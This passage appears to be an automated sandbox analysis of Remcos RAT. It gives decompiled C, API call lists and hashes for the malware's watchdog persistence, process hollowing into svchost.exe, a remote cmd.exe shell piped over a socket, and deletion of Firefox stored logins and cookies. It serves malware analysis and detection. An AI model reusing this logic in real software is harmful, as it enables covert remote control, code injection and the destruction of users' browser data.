                      • API ID: ExitThreadUser
                      • String ID:
                      • API String ID: 3424019298-0
                      • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                      • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                      • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                      • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416220039.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                      • Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
                      • Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                      • Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 82%
                      			E0074FAC7(void* __eflags) {
                      				char _v28;
                      				char _v36;
                      				void* _v40;
                      				char _v56;
                      				void* _v64;
                      				char _v76;
                      				char _v84;
                      				void* _v88;
                      				char _v100;
                      				char _v104;
                      				void* _v108;
                      				char _v124;
                      				char _v128;
                      				long _v132;
                      				char _v148;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				long _t26;
                      				void* _t29;
                      				void* _t35;
                      				void* _t46;
                      				void* _t61;
                      				void* _t78;
                      				void* _t107;
                      				long _t112;
                      				long _t141;
                      				void* _t142;
                      				CHAR* _t143;
                      				void* _t145;
                      				signed int _t147;
                      				void* _t149;
                      				void* _t155;
                      
                      				_t149 = (_t147 & 0xfffffff8) - 0x7c;
                      				_push(_t142);
                      				_t26 = GetCurrentProcessId();
                      				if(E00750BB0(0x7ac518, E00741F95(0x7ac518), "WD", _t26) != 0) {
                      					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                      					__eflags = _t29;
                      					if(_t29 == 0) {
                      						E007420D5(0x7ac518,  &_v100);
                      						E007579DC(E00741EEB(0x7ac500),  &_v100);
                      						E00741F6D(0x7ac518,  &_v124);
                      						__eflags = E00757614( &_v124);
                      						if(__eflags != 0) {
                      							_t35 = E0074427F(0x7ac518,  &_v76, L"\\SysWOW64");
                      							E00741EFA( &_v132, _t37, _t142, E00743030( &_v36, E0074427F(0x7ac518,  &_v56, E0077987F(0x7ac518,  &_v76, __eflags, L"WinDir")), _t35));
                      							E00741EF0();
                      							E00741EF0();
                      						} else {
                      							_t61 = E0074427F(0x7ac518,  &_v28, L"\\system32");
                      							E00741EFA( &_v132, _t63, _t142, E00743030( &_v84, E0074427F(0x7ac518,  &_v56, E0077987F(0x7ac518,  &_v28, __eflags, L"WinDir")), _t61));
                      							E00741EF0();
                      							E00741EF0();
                      						}
                      						E00741EF0();
                      						E0074766C(0x7ac518,  &_v124, 0, L"\\svchost.exe");
                      						_t143 = E00741F95( &_v104);
                      						_t46 = E0075412B(E00741EEB( &_v128), _t143, 0x7abd50);
                      						_t150 = _t149 - 0x18;
                      						_t107 = _t149 - 0x18;
                      						__eflags = _t46;
                      						if(_t46 != 0) {
                      							E00742084(0x7ac518, _t107, "Watchdog module activated");
                      							E00742084(0x7ac518, _t150 - 0x18, "[Info]");
                      							E00756C80(0x7ac518, 0);
                      							Sleep(0x7d0);
                      							_t112 =  *0x7abd58; // 0x0
                      							goto L13;
                      						}
                      						E00742084(0x7ac518, _t107, "Watchdog launch failed!");
                      						E00742084(0x7ac518, _t150 - 0x18, "[ERROR]");
                      						E00756C80(0x7ac518, 0);
                      						CloseHandle( *0x7abd60);
                      						E00741EF0();
                      						E00741FC7();
                      						_push(3);
                      						_pop(1);
                      					} else {
                      						CloseHandle(_t29);
                      						_t155 = _t149 - 0x18;
                      						E00742084(0x7ac518, _t155, "Remcos restarted by watchdog!");
                      						_t156 = _t155 - 0x18;
                      						E00742084(0x7ac518, _t155 - 0x18, "[Info]");
                      						E00756C80(0x7ac518, 0);
                      						E00742084(0x7ac518, _t156 + 0x18, "Watchdog module activated");
                      						E00742084(0x7ac518, _t156 + 0x18 - 0x18, "[Info]");
                      						E00756C80(0x7ac518, 0);
                      						CreateThread(0, 0, E007500F9, 0, 0, 0);
                      						_t143 = "WDH";
                      						_t78 = E00750885(E00741F95(0x7ac518), _t143,  &_v148);
                      						__eflags = _t78;
                      						if(_t78 == 0) {
                      							goto L1;
                      						} else {
                      							 *0x7abd50 = OpenProcess(0x1fffff, 0, _v132);
                      							E00750CE2(E00741F95(0x7ac518), __eflags, _t143);
                      							_t112 = _v132;
                      							L13:
                      							L14();
                      							asm("int3");
                      							_push(_t143);
                      							_push(0);
                      							_t141 = _t112;
                      							L15:
                      							_t145 = OpenProcess(0x100000, 0, _t141);
                      							WaitForSingleObject(_t145, 0xffffffff);
                      							CloseHandle(_t145);
                      							__eflags =  *0x7abd4e;
                      							if(__eflags != 0) {
                      								E0074FAC7(__eflags, 0);
                      							}
                      							goto L15;
                      						}
                      						L17:
                      					}
                      				} else {
                      					L1:
                      				}
                      				return 1;
                      				goto L17;
                      			}

                      APIs
                      • GetCurrentProcessId.KERNEL32 ref: 0074FAD3
                        • Part of subcall function 00750BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0079F6BC), ref: 00750BBE
                        • Part of subcall function 00750BB0: RegSetValueExA.ADVAPI32(0079F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0074A669,0079FEF8,00000001,000000AF,0079F6BC), ref: 00750BD9
                        • Part of subcall function 00750BB0: RegCloseKey.ADVAPI32(0079F6BC,?,?,?,0074A669,0079FEF8,00000001,000000AF,0079F6BC), ref: 00750BE4
                      • OpenMutexA.KERNEL32 ref: 0074FB0D
                      • CloseHandle.KERNEL32(00000000), ref: 0074FB1C
                      • CreateThread.KERNEL32 ref: 0074FB72
                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0074FD3A
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                      • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                      • API String ID: 3018269243-3797382479
                      • Opcode ID: 8b6147feb0e7a34f7c86fb49196e18f95bb0a08c01cff5e3edcf7fc828d8790c
                      • Instruction ID: a46a36dfc0035f883465f07e81e4335ef38b835030e6da93e4cd00b75d9f953f
                      • Opcode Fuzzy Hash: 8b6147feb0e7a34f7c86fb49196e18f95bb0a08c01cff5e3edcf7fc828d8790c
                      • Instruction Fuzzy Hash: 9051C271614200EBC608BB70DC5F8AF77A5AED2711FD0092DF942571E3EF6C994AC6A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E0075412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
                      				void _v8;
                      				signed int _v12;
                      				void* _v16;
                      				CONTEXT* _v20;
                      				WCHAR* _v24;
                      				struct _STARTUPINFOW _v92;
                      				void* __edi;
                      				void* _t58;
                      				void _t72;
                      				void* _t73;
                      				int _t83;
                      				intOrPtr* _t95;
                      				void* _t98;
                      				signed int _t102;
                      				void* _t104;
                      				void* _t106;
                      				CONTEXT* _t110;
                      				void* _t113;
                      				CONTEXT* _t114;
                      				struct _PROCESS_INFORMATION* _t116;
                      
                      				_v8 = _v8 & 0x00000000;
                      				_v16 = __edx;
                      				_v24 = __ecx;
                      				if( *__edx == 0x5a4d) {
                      					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                      					if( *_t95 == 0x4550) {
                      						_push(_t106);
                      						E00771F00(_t106,  &_v92, 0, 0x44);
                      						_t116 = _a4;
                      						asm("stosd");
                      						asm("stosd");
                      						asm("stosd");
                      						asm("stosd");
                      						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
                      							L21:
                      							_t58 = 0;
                      							L22:
                      							L23:
                      							return _t58;
                      						}
                      						CloseHandle(_v92.hStdInput);
                      						CloseHandle(_v92.hStdOutput);
                      						CloseHandle(_v92.hStdError);
                      						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                      						_v20 = _t110;
                      						_t110->ContextFlags = 0x10007;
                      						_t14 =  &(_t116->hThread); // 0xffffdcf2
                      						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
                      							L20:
                      							TerminateProcess(_t116->hProcess, 0);
                      							CloseHandle(_t116->hProcess);
                      							_t50 =  &(_t116->hThread); // 0xffffdcf2
                      							CloseHandle( *_t50);
                      							asm("stosd");
                      							asm("stosd");
                      							asm("stosd");
                      							asm("stosd");
                      							goto L21;
                      						} else {
                      							_t72 = _v8;
                      							if(_t72 ==  *(_t95 + 0x34)) {
                      								 *0x7abd24(_t116->hProcess, _t72);
                      							}
                      							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
                      							_v24 = _t73;
                      							if(_t73 == 0) {
                      								goto L20;
                      							} else {
                      								_t113 = _v16;
                      								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
                      									goto L20;
                      								}
                      								_v12 = _v12 & 0x00000000;
                      								if(0 >=  *(_t95 + 6)) {
                      									L14:
                      									_t98 = _t95 + 0x34;
                      									_t114 = _v20;
                      									if(_v8 ==  *_t98) {
                      										L17:
                      										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                      										_t48 =  &(_t116->hThread); // 0xffffdcf2
                      										if(SetThreadContext( *_t48, _t114) == 0) {
                      											goto L20;
                      										}
                      										_t49 =  &(_t116->hThread); // 0xffffdcf2
                      										if(ResumeThread( *_t49) == 0xffffffff) {
                      											goto L20;
                      										}
                      										_t58 = 1;
                      										goto L22;
                      									}
                      									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
                      									if(_t83 != 0) {
                      										goto L17;
                      									}
                      									TerminateProcess(_t116->hProcess, _t83);
                      									goto L21;
                      								}
                      								_t104 = 0;
                      								_v16 = 0;
                      								do {
                      									_t28 = _t113 + 0x3c; // 0x83ffc983
                      									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
                      									_t37 =  &_v16; // 0x75433b
                      									_t102 = _v12 + 1;
                      									_t104 =  *_t37 + 0x28;
                      									_v12 = _t102;
                      									_v16 = _t104;
                      								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                      								goto L14;
                      							}
                      						}
                      					}
                      					_t58 = 0;
                      					goto L23;
                      				}
                      				return 0;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ;Cu
                      • API String ID: 0-742672918
                      • Opcode ID: 4a0ecdc103eaf0599c16ad51cd874516491e1e01400dabd42b1375ec64feaaf7
                      • Instruction ID: fd41d94cd3dfc1444890c4215b092c1c3f576008553dea06aebbb27a1e656c87
                      • Opcode Fuzzy Hash: 4a0ecdc103eaf0599c16ad51cd874516491e1e01400dabd42b1375ec64feaaf7
                      • Instruction Fuzzy Hash: 6D517D71600604FFEB208FA5CC45FAABBB9FF44705F108015FA44E61B0D7BA9955DB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E007455EA(char _a4) {
                      				long _v8;
                      				long _v12;
                      				long _v16;
                      				char _v40;
                      				char _v64;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				long _t52;
                      				void* _t56;
                      				void* _t66;
                      				void* _t70;
                      				void* _t79;
                      				CHAR* _t80;
                      				int _t98;
                      				intOrPtr* _t107;
                      				intOrPtr _t138;
                      				signed int _t146;
                      				signed int _t147;
                      				long _t151;
                      				void* _t155;
                      				intOrPtr* _t156;
                      				void* _t163;
                      				void* _t168;
                      				void* _t175;
                      
                      				_t156 = _t155 - 0x3c;
                      				_push(_t146);
                      				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
                      				_t147 = _t146 | 0xffffffff;
                      				_t98 = 0;
                      				if( *0x7adce8 >  *((intOrPtr*)(_t138 + 4))) {
                      					E0076F114(0x7adce8);
                      					_t160 =  *0x7adce8 - _t147;
                      					if( *0x7adce8 == _t147) {
                      						E0074484E(0, 0x7adc60, 0);
                      						E0076F49E(_t160, E007927B3);
                      						 *_t156 = 0x7adce8;
                      						E0076F0D5(_t147);
                      					}
                      				}
                      				if( *0x7adcc8 >  *((intOrPtr*)(_t138 + 4))) {
                      					E0076F114(0x7adcc8);
                      					_t162 =  *0x7adcc8 - _t147;
                      					if( *0x7adcc8 == _t147) {
                      						E007420D5(_t98, 0x7adcf0);
                      						E0076F49E(_t162, E007927A9);
                      						E0076F0D5(_t147, 0x7adcc8);
                      					}
                      				}
                      				_t100 =  &_v40;
                      				E007420D5(_t98,  &_v40);
                      				_t139 = 0x7ac2d0;
                      				_v8 = _t98;
                      				_t163 =  *0x7abae2 - _t98; // 0x0
                      				if(_t163 != 0) {
                      					L12:
                      					_v12 = _t98;
                      					PeekNamedPipe( *0x7adcd0, _t98, _t98, _t98,  &_v12, _t98);
                      					if(_v12 <= _t98) {
                      						_t156 = _t156 - 0x18;
                      						E00742084(_t98, _t156, 0x79f6bc);
                      						_push(0x62);
                      						_t147 = E00744AA4(_t98, 0x7adc60, _t136, __eflags);
                      						goto L21;
                      					}
                      					_push(_v12);
                      					_t56 = E007794F6(_t100);
                      					_t140 = _t56;
                      					ReadFile( *0x7adcd0, _t56, _v12,  &_v16, _t98);
                      					if(_v16 <= _t98) {
                      						L19:
                      						L007794F1(_t140);
                      						_t139 = 0x7ac2d0;
                      						goto L21;
                      					}
                      					if(_v8 <= _t98) {
                      						L17:
                      						E00742084(_t98,  &_v64, _t140);
                      						_t156 = _t156 - 0x18;
                      						_t107 = _t156;
                      						_push(_v16);
                      						_push(_t98);
                      						L18:
                      						E00745A14(_t98, _t107, _t136, _t172);
                      						_t147 = E00744AA4(_t98, 0x7adc60, _t136, _t172, 0x62,  &_v64);
                      						E00741FC7();
                      						goto L19;
                      					}
                      					_t66 = E00779510(_t140, E00741F95( &_v40), _v8);
                      					_t156 = _t156 + 0xc;
                      					_t172 = _t66;
                      					if(_t66 != 0) {
                      						goto L17;
                      					}
                      					E00742084(_t98,  &_v64, _t140);
                      					_t156 = _t156 - 0x18;
                      					_t107 = _t156;
                      					_push(_v16 - _v8);
                      					_push(_v8);
                      					goto L18;
                      				} else {
                      					_t136 = "cmd.exe";
                      					_t70 = E00745A6F("cmd.exe");
                      					_t164 = _t70;
                      					if(_t70 == 0) {
                      						L26:
                      						E00744E0B(0x7adc60);
                      						CloseHandle( *0x7adcd0);
                      						CloseHandle( *0x7adcec);
                      						 *0x7abae2 = _t98;
                      						_t98 = 1;
                      						L27:
                      						E00741FC7();
                      						E00741FC7();
                      						return _t98;
                      					}
                      					E00745A0B(_t98, 0x7adcf0, E0077988A(_t98, _t164, "SystemDrive"));
                      					E00745A02(_t98, 0x7adcf0, 0x7ac2d0, "\\");
                      					0x7adc08->nLength = 0xc;
                      					 *0x7adc10 = 1;
                      					 *0x7adc0c = _t98;
                      					if(CreatePipe(0x7adce4, 0x7adccc, 0x7adc08, _t98) == 0 || CreatePipe(0x7adcd0, 0x7adcec, 0x7adc08, _t98) == 0) {
                      						goto L27;
                      					} else {
                      						_t151 = 0x44;
                      						E00771F00(0x7adc18, 0x7adc18, _t98, CreatePipe);
                      						0x7adc18->cb = _t151;
                      						 *0x7adc44 = 0x101;
                      						 *0x7adc48 = 0;
                      						 *0x7adc50 =  *0x7adce4;
                      						_t79 =  *0x7adcec;
                      						 *0x7adc54 = _t79;
                      						 *0x7adc58 = _t79;
                      						_t80 = E00741F95(0x7adcf0);
                      						 *0x7abae2 = CreateProcessA(_t98, E00741F95(0x7ac2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x7adc18, 0x7adcd4) != 0;
                      						E00745A0B(_t98, 0x7ac2d0, 0x79f6bc);
                      						 *0x7abae3 = 1;
                      						E0074498B(0x7adc60);
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						E00744A08("cmd.exe");
                      						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
                      						E007420EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E00741F95(0x7ac2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x7adc18, 0x7adcd4),  &_a4);
                      						_push(0x93);
                      						_t100 = 0x7adc60;
                      						_t147 = E00744AA4(_t98, 0x7adc60, "cmd.exe", CreateProcessA(_t98, E00741F95(0x7ac2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x7adc18, 0x7adcd4));
                      						Sleep(0x12c);
                      						_t168 =  *0x7abae2 - _t98; // 0x0
                      						if(_t168 == 0) {
                      							goto L26;
                      						}
                      						_t139 = 0x7ac2d0;
                      						do {
                      							goto L12;
                      							L21:
                      							_t38 =  <=  ? 0 :  *0x7abae3 & 0x000000ff;
                      							_t100 = _t139;
                      							 *0x7abae3 =  <=  ? 0 :  *0x7abae3 & 0x000000ff;
                      							if(E00742489() == 0) {
                      								_v8 = _t98;
                      							} else {
                      								E00745A02(_t98, _t139, _t139, "\n");
                      								E00741FAD( &_v40, _t139);
                      								_t52 = E00742489();
                      								WriteFile( *0x7adccc, E00741F95(_t139), _t52,  &_v8, _t98);
                      								_t100 = _t139;
                      								E00745A0B(_t98, _t139, 0x79f6bc);
                      							}
                      							Sleep(0x64);
                      							_t175 =  *0x7abae3 - _t98; // 0x0
                      						} while (_t175 != 0);
                      						TerminateProcess(0x7adcd4->hProcess, _t98);
                      						CloseHandle( *0x7adcd8);
                      						CloseHandle( *0x7adcd4);
                      						goto L26;
                      					}
                      				}
                      			}

                      APIs
                      • __Init_thread_footer.LIBCMT ref: 0074563C
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      • __Init_thread_footer.LIBCMT ref: 00745679
                      • CreatePipe.KERNEL32(007ADCE4,007ADCCC,007ADC08,00000000,0079F6D4,00000000), ref: 00745704
                      • CreatePipe.KERNEL32(007ADCD0,007ADCEC,007ADC08,00000000), ref: 0074571A
                      • CreateProcessA.KERNEL32 ref: 0074578D
                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 007457F4
                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0074581C
                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00745845
                        • Part of subcall function 0076F49E: __onexit.LIBCMT ref: 0076F4A4
                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,007AC2D0,0079F6D8,00000062,0079F6BC), ref: 00745932
                      • Sleep.KERNEL32(00000064,00000062,0079F6BC), ref: 0074594B
                      • TerminateProcess.KERNEL32(00000000), ref: 00745964
                      • CloseHandle.KERNEL32 ref: 00745970
                      • CloseHandle.KERNEL32 ref: 0074597C
                      • CloseHandle.KERNEL32 ref: 00745992
                      • CloseHandle.KERNEL32 ref: 0074599E
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                      • String ID: SystemDrive$cmd.exe
                      • API String ID: 2994406822-3633465311
                      • Opcode ID: b264dba44dc94f5117fce0d39b030f923bf531a86dcfc48bae1ec4ea14529c1d
                      • Instruction ID: bcee7a6c1cdccf4e146f9946547a7ad5ed83adde58c5b30782528038420dcb23
                      • Opcode Fuzzy Hash: b264dba44dc94f5117fce0d39b030f923bf531a86dcfc48bae1ec4ea14529c1d
                      • Instruction Fuzzy Hash: 2D91E971A00204FFCB25BB74ED4A9AE7B69BBC6720B808129F402A7662DF7C5D01D775
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0074A012(void* __ebx, void* __edi, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				struct _WIN32_FIND_DATAA _v468;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t45;
                      				signed int _t58;
                      				signed int _t59;
                      				signed int _t73;
                      				signed int _t75;
                      				char* _t108;
                      				signed int _t109;
                      				char* _t129;
                      				void* _t130;
                      				void* _t134;
                      				void* _t135;
                      				void* _t136;
                      				void* _t137;
                      
                      				_t142 = __eflags;
                      				_t134 = __edi;
                      				_t89 = __ebx;
                      				E007420D5(__ebx,  &_v100);
                      				E007420D5(__ebx,  &_v76);
                      				E007420D5(__ebx,  &_v28);
                      				_t45 = E00742084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                      				E00741FD1( &_v28, _t46, _t135, E007475C2(_t89,  &_v52, E0077988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                      				E00741FC7();
                      				E00741FC7();
                      				_t128 =  &_v28;
                      				_t136 = FindFirstFileA(E00741F95(E00747558( &_v124,  &_v28, _t142, "*")),  &_v468);
                      				E00741FC7();
                      				_t143 = _t136 - 0xffffffff;
                      				if(_t136 != 0xffffffff) {
                      					while(1) {
                      						L15:
                      						__eflags = FindNextFileA(_t136,  &_v468);
                      						if(__eflags == 0) {
                      							break;
                      						}
                      						__eflags = _v468.dwFileAttributes & 0x00000010;
                      						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                      							continue;
                      						}
                      						_t108 =  &(_v468.cFileName);
                      						__eflags =  *_t108 - 0x2e;
                      						if( *_t108 != 0x2e) {
                      							L5:
                      							_t129 =  &(_v468.cFileName);
                      							_t109 = 0;
                      							__eflags = 0;
                      							while(1) {
                      								_t58 =  *(_t129 + _t109) & 0x000000ff;
                      								_t130 = "..";
                      								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                      								_t128 =  &(_v468.cFileName);
                      								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                      									break;
                      								}
                      								_t109 = _t109 + 1;
                      								__eflags = _t109 - 3;
                      								if(_t109 != 3) {
                      									continue;
                      								}
                      								_t59 = 0;
                      								L10:
                      								__eflags = _t59;
                      								if(__eflags != 0) {
                      									E00741FD1( &_v100, _t61, _t136, E00745343(_t89,  &_v52, E00747558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                      									E00741FC7();
                      									E00741FC7();
                      									_t128 = E00747558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                      									E00741FD1( &_v76, _t67, _t136, E00745343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                      									E00741FC7();
                      									E00741FC7();
                      									_t73 = DeleteFileA(E00741F95( &_v100));
                      									__eflags = _t73;
                      									if(_t73 == 0) {
                      										GetLastError();
                      									}
                      									_t75 = DeleteFileA(E00741F95( &_v76));
                      									__eflags = _t75;
                      									if(_t75 == 0) {
                      										GetLastError();
                      									}
                      								}
                      								goto L15;
                      							}
                      							asm("sbb eax, eax");
                      							_t59 = _t58 | 0x00000001;
                      							__eflags = _t59;
                      							goto L10;
                      						}
                      						__eflags =  *(_t108 + 1) & 0x000000ff;
                      						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                      							continue;
                      						}
                      						goto L5;
                      					}
                      					E00742084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                      					E0074A6EF(_t89, _t128, __eflags);
                      					FindClose(_t136);
                      					goto L17;
                      				} else {
                      					FindClose(_t136);
                      					E00742084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                      					E0074A6EF(_t89,  &_v28, _t143);
                      					L17:
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      					return 1;
                      				}
                      			}


                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0074A091
                      • FindClose.KERNEL32(00000000), ref: 0074A0AB
                      • FindNextFileA.KERNEL32(00000000,?), ref: 0074A1E2
                      • FindClose.KERNEL32(00000000), ref: 0074A208
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Find$CloseFile$FirstNext
                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                      • API String ID: 1164774033-3681987949
                      • Opcode ID: 007f46b21840afc3166bcfc480e733e24b71cd03ffd7e3ee5a5eda26b34f1015
                      • Instruction ID: 843d73fd21330ddb203f034b9f85ad916ddd0bba5208430738fdfeb0a48eb69c
                      • Opcode Fuzzy Hash: 007f46b21840afc3166bcfc480e733e24b71cd03ffd7e3ee5a5eda26b34f1015
                      • Instruction Fuzzy Hash: 8A51413195511DABCF18FB74DC5A9EEB774BF12300F800569F406A60A2FF7C5A8ACA51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E0074A22D(void* __edi, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				struct _WIN32_FIND_DATAA _v444;
                      				void* __ebx;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t35;
                      				signed int _t56;
                      				signed int _t57;
                      				long _t68;
                      				char* _t92;
                      				signed int _t93;
                      				void* _t102;
                      				char* _t105;
                      				void* _t106;
                      				void* _t108;
                      				void* _t109;
                      				void* _t110;
                      				void* _t111;
                      
                      				_t116 = __eflags;
                      				_t108 = __edi;
                      				E007420D5(0,  &_v52);
                      				E007420D5(0,  &_v28);
                      				_t35 = E00742084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                      				E00741FD1( &_v28, _t36, _t109, E007475C2(0,  &_v76, E0077988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
                      				E00741FC7();
                      				E00741FC7();
                      				_t104 =  &_v28;
                      				_t110 = FindFirstFileA(E00741F95(E00747558( &_v100,  &_v28, _t116, "*")),  &_v444);
                      				E00741FC7();
                      				_t117 = _t110 - 0xffffffff;
                      				if(_t110 != 0xffffffff) {
                      					__eflags = FindNextFileA(_t110,  &_v444);
                      					if(__eflags == 0) {
                      						L17:
                      						E00742084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
                      						E0074A6EF(0, _t104, __eflags);
                      						FindClose(_t110);
                      						goto L18;
                      					} else {
                      						__eflags = 0;
                      						do {
                      							__eflags = _v444.dwFileAttributes & 0x00000010;
                      							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                      								goto L16;
                      							} else {
                      								_t92 =  &(_v444.cFileName);
                      								__eflags =  *_t92 - 0x2e;
                      								if( *_t92 != 0x2e) {
                      									L8:
                      									_t105 =  &(_v444.cFileName);
                      									_t93 = 0;
                      									while(1) {
                      										_t56 =  *(_t105 + _t93) & 0x000000ff;
                      										_t106 = "..";
                      										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
                      										_t104 =  &(_v444.cFileName);
                      										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
                      											break;
                      										}
                      										_t93 = _t93 + 1;
                      										__eflags = _t93 - 3;
                      										if(_t93 != 3) {
                      											continue;
                      										} else {
                      											_t57 = 0;
                      										}
                      										L13:
                      										__eflags = _t57;
                      										if(__eflags == 0) {
                      											goto L16;
                      										} else {
                      											_t104 = E00747558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                      											E00741FD1( &_v52, _t59, _t110, E00745343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
                      											E00741FC7();
                      											E00741FC7();
                      											__eflags = DeleteFileA(E00741F95( &_v52));
                      											if(__eflags != 0) {
                      												_t102 = _t111 - 0x18;
                      												_push("\n[Firefox cookies found, cleared!]");
                      												goto L2;
                      											} else {
                      												_t68 = GetLastError();
                      												__eflags = _t68 != 0;
                      												if(_t68 != 0) {
                      													FindClose(_t110);
                      												} else {
                      													goto L16;
                      												}
                      											}
                      										}
                      										goto L19;
                      									}
                      									asm("sbb eax, eax");
                      									_t57 = _t56 | 0x00000001;
                      									__eflags = _t57;
                      									goto L13;
                      								} else {
